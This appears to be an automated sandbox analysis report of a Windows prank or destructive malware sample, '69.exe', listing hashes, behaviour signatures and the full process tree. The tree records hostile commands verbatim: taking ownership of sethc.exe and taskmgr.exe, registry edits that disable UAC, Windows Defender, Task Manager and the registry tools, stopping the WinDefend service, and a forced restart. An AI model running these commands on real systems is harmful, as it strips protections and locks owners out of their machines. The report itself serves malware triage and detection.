Resubmissions

10-10-2024 22:41

241010-2mlydswbmn 10

21-09-2024 20:56

240921-zq2f5stcqk 3

21-09-2024 19:40

240921-ydv8xszdjp 10

21-09-2024 19:07

240921-xszn8aybqe 10

Analysis

  • max time kernel
    7s
  • max time network
    7s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240729-en locale:en-us os:windows7-x64 system
  • submitted
    21-09-2024 19:07

Errors

Reason
Machine shutdown

General

  • Target

    69.exe

  • Size

    2.4MB

  • MD5

    165b9d15346eed1bd8da9780eb7ab4bf

  • SHA1

    a9895dca7b49cd345634809d03baa51d5078c639

  • SHA256

    6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7

  • SHA512

    b70d1ca87b71b2d0b9611e51e0a26e27b7d1a75072113965cbced770e3f46d9b7147225cb566ec06cac2921f8e4860faf882f96d2a866b2408dfacd4aaeecbf7

  • SSDEEP

    49152:GpUlRhMQfcBROIbrGTPmbpzyLdKDfWLDooV9VwwzuDDFDdexGQw:GpUlBcjnpkwfkkS9V/YTAGj

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 8 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 3 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 27 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69.exe
    "C:\Users\Admin\AppData\Local\Temp\69.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\PerfLogs\windows\exec.exe
        "C:\PerfLogs\windows\exec.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"
          4⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\PerfLogs\windows\jumpscare.exe
            jumpscare.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of WriteProcessMemory
            PID:1720
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2376
              • C:\Program Files\Windows Media Player\wmplayer.exe
                wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
                7⤵
                • Enumerates connected drives
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1424
          • C:\PerfLogs\windows\rnbowspam.exe
            rnbowspam.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of WriteProcessMemory
            PID:1380
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1276
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:760
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1428
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2228
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1944
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2212
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2016
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2944
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2896
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2336
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2472
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2280
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:432
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1952
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1328
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2896
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2164
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1860
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:3040
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2192
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1596
              • C:\Windows\system32\timeout.exe
                timeout /t 1
                7⤵
                • Delays execution with timeout.exe
                PID:2040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                PID:1808
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:288
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2244
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:3068
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2576
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                  • Delays execution with timeout.exe
                  PID:808
              • C:\Windows\system32\timeout.exe
                timeout /t 1
                7⤵
                • Delays execution with timeout.exe
                PID:2396
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                PID:2220
              • C:\Windows\system32\timeout.exe
                timeout /t 1
                7⤵
                • Delays execution with timeout.exe
                PID:444
          • C:\Windows\System32\takeown.exe
            takeown /f taskmgr.exe
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:376
          • C:\Windows\System32\takeown.exe
            takeown /f sethc.exe
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:2520
          • C:\Windows\System32\icacls.exe
            icacls "sethc.exe" /granted "Admin":F
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:988
          • C:\Windows\System32\icacls.exe
            icacls "taskmgr.exe" /granted "Admin":F
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1508
          • C:\Windows\System32\takeown.exe
            takeown /f reg.exe
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:588
          • C:\Windows\System32\icacls.exe
            icacls "reg.exe" /granted "Admin":F
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:572
          • C:\Windows\system32\takeown.exe
            takeown /f regedit.exe
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
          • C:\Windows\system32\icacls.exe
            icacls "regedit.exe" /granted "Admin":F
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:604
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
            5⤵
            PID:2576
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
            5⤵
            PID:1132
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
            5⤵
            PID:1080
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
            5⤵
            PID:1612
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            PID:1624
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            5⤵
            PID:2296
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
            5⤵
            PID:808
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
            5⤵
            PID:2168
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
            5⤵
            PID:2216
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
            5⤵
            PID:1648
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
            5⤵
            PID:2164
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
            5⤵
            • Sets desktop wallpaper using registry
            PID:2188
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
            5⤵
            PID:2044
          • C:\Windows\system32\rundll32.exe
            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
            5⤵
            PID:2248
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
            5⤵
            • Modifies system executable filetype association
            • Modifies registry class
            PID:2160
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
            5⤵
            • Modifies registry class
            PID:1860
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
            5⤵
            • Disables RegEdit via registry modification
            PID:1092
          • C:\Windows\system32\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            PID:1724
          • C:\Windows\system32\sc.exe
            sc config WinDefend start=disabled
            5⤵
            • Launches sc.exe
            PID:944
          • C:\Windows\system32\shutdown.exe
            shutdown -r -t 0
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2352
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
    PID:688
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"
    1⤵
    PID:2248
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x1
    1⤵
    PID:1216

Network

MITRE ATT&CK Enterprise v15


Downloads

                                    • C:\PerfLogs\windows\69rnspam.exe

                                      Filesize

                                      87KB


                                    • C:\PerfLogs\windows\exec.exe

                                      Filesize

                                      90KB


                                    • C:\PerfLogs\windows\jumpscare.exe

                                      Filesize

                                      87KB


                                    • C:\PerfLogs\windows\killrunas.vbs

                                      Filesize

                                      219B


                                    • C:\PerfLogs\windows\logon_overwrte.exe

                                      Filesize

                                      87KB


                                    • C:\PerfLogs\windows\rainbow.bat

                                      Filesize

                                      320B


                                    • C:\PerfLogs\windows\rnbowspam.exe

                                      Filesize

                                      87KB


                                    • C:\PerfLogs\windows\tape.mp4

                                      Filesize

                                      1.7MB


                                    • C:\PerfLogs\windows\warn.vbs

                                      Filesize

                                      209B


                                    • C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat

                                      Filesize

                                      3KB


                                    • C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat

                                      Filesize

                                      113B


                                    • C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat

                                      Filesize

                                      158B


                                    • C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt

                                      Filesize

                                      128B

